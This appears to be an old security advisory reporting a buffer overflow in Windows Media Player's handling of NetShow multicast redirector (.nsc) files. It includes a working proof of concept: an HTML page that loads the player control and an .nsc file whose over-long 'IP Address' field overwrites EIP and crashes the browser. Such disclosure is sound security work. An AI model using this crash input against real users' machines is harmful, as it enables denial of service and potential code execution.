Vulnerability
Media Player
Affected
Microsoft Windows Media Player
Description
Pauli Ojanpera found following. The same old story again, this
time with Netshow multicast redirector files. Check out the
codes below. Open the ipaddr.html and Your EIP gets busted.
(beware: IE crashes too so your windows get lost).
There is a whole lot of these in dxmasf.dll. This is just too
fun to post them one at the time. Many more known right now.
IPADDR.HTML:
<HTML>
<BODY>
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95
type="application/x-oleobject">
<PARAM NAME="Filename" VALUE="ipaddr.nsc">
</OBJECT>
</BODY>
</HTML>
IPADDR.NSC:
[Address]
IP Address=A000B000C000D000E000F000G000H000I000J000K000L000M000N000O000P000Q000R000S000T000U000
V000W0007000Y000Z000A010B010C010D010E010F010G010H010I010J010K010L010M010N010O010P010Q010R010
S010T010U010V010W0107010Y010Z010A020B020C020D020E020F020G020H020I020J020K020L020M020N020O020
P020Q020R020S020T020U020V020W0207020Y020Z020A030B030C030D030E030F030G030H030I030J030K030L030
M030N030O030P030Q030R030S030T030U030V030W0307030Y030Z030A040B040C040D040E040F040G040H040I040
J040K040L040M040N040O040P040Q040R040S040T040U040V040W0407040Y040Z040A050B050C050D050E050F050
G050H050I050J050K050L050M050N050O050P050Q050R050S050T050U050V050W0507050Y050Z050A060B060C060
D060E060F060G060H060I060J060K060L060M060N060O060P060Q060R060S060T060U060V060W0607060Y060Z060
A070B070C070D070E070F070G070H070I070J070K070L070M070N070O070P070Q070R070S070T070U070V070W070
8070Y070Z070A080B080C080D080E080F080G080H080I080J080K080L080M080N080O080P080Q080R080S080T080
U080V080W0809080Y080Z080A090B090C090D090E090F090G090H090I090J0
90K090L090M090N090O090P090Q090R090S090T090U090V090W090X090Y090Z090A101B101C101D101E101F101G1
01H101I101J101K101L101M101N101O101P101Q101R101S101T101AAAAV101W1017101Y101Z101A111B111C111D1
11E111F111G111H111I111J111K111L111M111N111O111P111Q111R111S111T111U111V111W1117111Y111Z111A1
21B121C121D121E121F121G121H121I121J121K121L121M121N121O121P121Q121R121S121T121U121V121W12171
21Y121Z121A131B131C131D131E131F131G131H131I131J131K131L131M131N131O131P131Q131R131S131T131U1
31V131W1317131Y131Z131A141B141C141D141E141F141G141H141I141J141K141L141M141N141O141P141Q141R1
41S141T141U141V141W1417141Y141Z141A151B151C151D151E151F151G151H151I151J151K151L151M151N151O1
51P151Q151R151S151T151U151V151W1517151Y151Z151A161B161C161D161E161F161G161H161I161J161K161L1
61M161N161O161P161Q161R161S161T161U161V161W1617161Y161Z161A171B171C171D171E171F171G171H171I1
71J171K171L171M171N171O171P171Q171R171S171T171U171V171W1718171Y171Z171A181B181C181D181E181F1
81G181H181I181J181K181L181M181N181O181P181Q181R181S181T181U181V18
1W1819181Y181Z181A191B191C191D191E191F191G191H191I191J191K191L191M191N191O191P191Q191R191S19
1T191U191V191W191X191Y191Z191A202B202C202D202E202F202G202H202I202J202K202L202M202N202O202P20
2Q202R202S202T202U202V202W2027202Y202Z202A212B212C212D212E212F212G212H212I212J212K212L212M21
2N212O212P212Q212R212S212T212U212V212W2127212Y212Z212A222B222C222D222E222F222G222H222I222J22
2K222L222M222N222O222P222Q222R222S222T222U222V222W2227222Y222Z222A232B232C232D232E232F232G23
2H232I232J232K232L232M232N232O232P232Q232R232S232T232U232V232W2327232Y232Z232A242B242C242D24
2E242F242G242H242I242J242K242L242M242N242O242P242Q242R242S242T242U242V242W2427242Y242Z242A25
2B252C252D252E252F252G252H252I252J252K252L252M252N252O252P252Q252R252S252T252U252V252W252725
2Y252Z252A262B262C262D262E262F262G262H262I262J262K262L262M262N262O262P262Q262R262S262T262U26
2V262W2627262Y262Z262A272B272C272D272E272F272G272H272I272J272K272L272M272N272O272P272Q272R27
2S272T272U272V272W2728272Y272Z272A282B282C282D282E282F282G282H282
I282J282K282L282M282N282O282P282Q282R282S282T282U282V282W2829282Y282Z282A292B292C292D292E292
F292G292H292I292J292K292L292M292N292O292P292Q292R292S292T292U292V292W292X292Y292Z292A303B303
C303D303E303F303G303H303I303J303K303L303M303N303O303P303Q303R303S303T303U303V303W3037303Y303
Z303A313B313C313D313E313F313BBBB
Solution
Nothing yet.
Credits
-- UnKnown --
|